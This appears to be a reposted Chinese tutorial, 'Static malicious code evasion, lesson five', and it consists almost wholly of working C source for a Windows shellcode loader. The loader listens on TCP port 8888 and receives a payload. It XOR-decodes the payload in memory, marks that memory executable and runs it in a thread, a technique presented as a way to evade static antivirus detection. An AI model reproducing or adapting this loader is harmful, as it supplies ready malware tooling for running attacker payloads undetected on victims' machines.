静态恶意代码逃逸(第五课)
该程序是一个基于Windows的网络服务程序,通过WinSock库创建TCP服务器,监听8888端口,接收客户端发送的数据,并将其作为Shellcode在内存中解密后执行. 2019-11-10 00:0:0 Author: payloads.online(查看原文) 阅读量:0 收藏 
 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92

#include <WinSock2.h>
#include <Windows.h>
#include <stdio.h>
#include <intrin.h>

#pragma comment(lib,"ws2_32.lib")

BOOL RunCode(CHAR * code,DWORD dwCodeLen)
{
    HANDLE hThread;
    DWORD dwOldProtect;
    DWORD dwThreadId;
    PCHAR pszShellcode = (PCHAR)VirtualAlloc(NULL,dwCodeLen,MEM_COMMIT,PAGE_READWRITE);
    CopyMemory(pszShellcode,code,dwCodeLen);

    for(DWORD i = 0;i< dwCodeLen; i++){
            _InterlockedXor8(pszShellcode+i,10);
    }
    // 这里开始更改它的属性为可执行
        VirtualProtect(pszShellcode,dwCodeLen,PAGE_EXECUTE,&dwOldProtect);
        // 执行Shellcode
        hThread = CreateThread(
            NULL, // 安全描述符
            NULL, // 栈的大小
            (LPTHREAD_START_ROUTINE)pszShellcode, // 函数
            NULL, // 参数
            NULL, // 线程标志
            &dwThreadId // 线程ID
        );
        WaitForSingleObject(hThread,INFINITE);
        return TRUE;
}

int wmain(int argc, TCHAR argv[]){
    CHAR buf[801];
    DWORD dwError;
    WORD sockVersion = MAKEWORD(2, 2);
    WSADATA wsaData;
    SOCKET socks;
    SOCKET sClient;
    struct sockaddr_in s_client;
    INT nAddrLen = sizeof(s_client);
    SHORT sListenPort = 8888;
    struct sockaddr_in sin;

    if (WSAStartup(sockVersion, &wsaData) != 0)
    {
        dwError = GetLastError();
        printf("[*]WSAStarup Error : %d \n",dwError);
        return dwError;
    }

    socks = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);

    if (socks == INVALID_SOCKET)
    {
        dwError = GetLastError();
        printf("[*]Socket Error : %d \n",dwError);
        return dwError;
    }

    sin.sin_family = AF_INET;
    sin.sin_port = htons(sListenPort);
    sin.sin_addr.S_un.S_addr = INADDR_ANY;

    if(bind(socks,(struct sockaddr *)&sin,sizeof(sin)) == SOCKET_ERROR )
    {
        dwError = GetLastError();
        printf("[*]Bind Error : %d \n",dwError);
        return dwError;
    }

    if (listen(socks, 5) == SOCKET_ERROR)
    {
        dwError = GetLastError();
        printf("[*]Listen  Error : %d \n",dwError);
        return dwError;
    }

    sClient = accept(socks, (SOCKADDR *)&s_client, &nAddrLen);
    int ret = recv(sClient,buf,sizeof(buf),0);
    if (ret > 0)
    {
        printf("[+]Recv %d-Bytes \n",ret);
        closesocket(sClient);
        closesocket(socks);
    }

    WSACleanup();
    RunCode(buf,sizeof(buf));
    return 0;
}

文章来源: https://payloads.online/archivers/2019-11-10/5/
如有侵权请联系:admin#unsafe.sh